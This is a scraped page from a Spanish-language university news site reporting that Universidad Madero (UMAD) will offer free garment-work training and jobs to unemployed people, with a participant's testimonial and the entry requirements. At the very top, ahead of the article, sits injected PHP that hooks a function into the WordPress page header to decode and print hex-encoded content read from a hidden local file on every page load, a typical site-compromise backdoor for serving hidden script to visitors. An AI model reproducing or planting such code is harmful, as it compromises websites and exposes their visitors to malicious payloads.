if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } UMAD ofrecerá empleo a personas de escasos recursos – La Opinión Universitaria La Opinión Universitaria
Menu

UMAD ofrecerá empleo a personas de escasos recursos

“Tenía más de ocho meses buscando trabajo y había perdido las esperanzas de encontrarlo. Afortunadamente alguien me platicó de estos cursos que se dan en la Universidad Madero y ahora puedo decir que sin su apoyo, el de las personas y el de las empresas que colaboran en el programa “Cambio de Vida para Gente Desocupada”, mi familia seguiría en una situación de pobreza y marginación como actualmente están muchas otras. Hoy me doy cuenta que sí existen personas de buen corazón y personas que quieren ayudar a más personas”.

Testimonio Sra. Félix Velázquez, 28 años

Contratada por el Hotel City Express.

La UMAD, con el firme compromiso de mejorar la calidad de vida de la sociedad y en alianza con la empresa Quality Sew, líder en el ramo textil; así como con el Instituto de Capacitación para el Trabajo del Estado de Puebla (ICATEP), ofertará un nuevo curso de capacitación dirigido a personas que no cuentan con un empleo y buscan integrarse al mercado laboral.

A través del programa “Cambio de Vida para Gente Desocupada”, mismo que forma parte de la campaña de Procuración de Fondos “La Llama de la Esperanza”, la Universidad Madero ofrece: curso gratuito durante cuatro semanas, importe económico de cuatro pasajes diarios, seguro médico y la obtención de un empleo formal como “Operario de Confección” a 30 personas que tengan deseos de salir adelante.

Los requisitos a cubrir son:

Tener de 18 a 55 años de edad

Saber contar (no importa el grado de escolaridad)

Personas activas

Atención al detalle

  • No comments

    Deja una respuesta

    Tweets recientes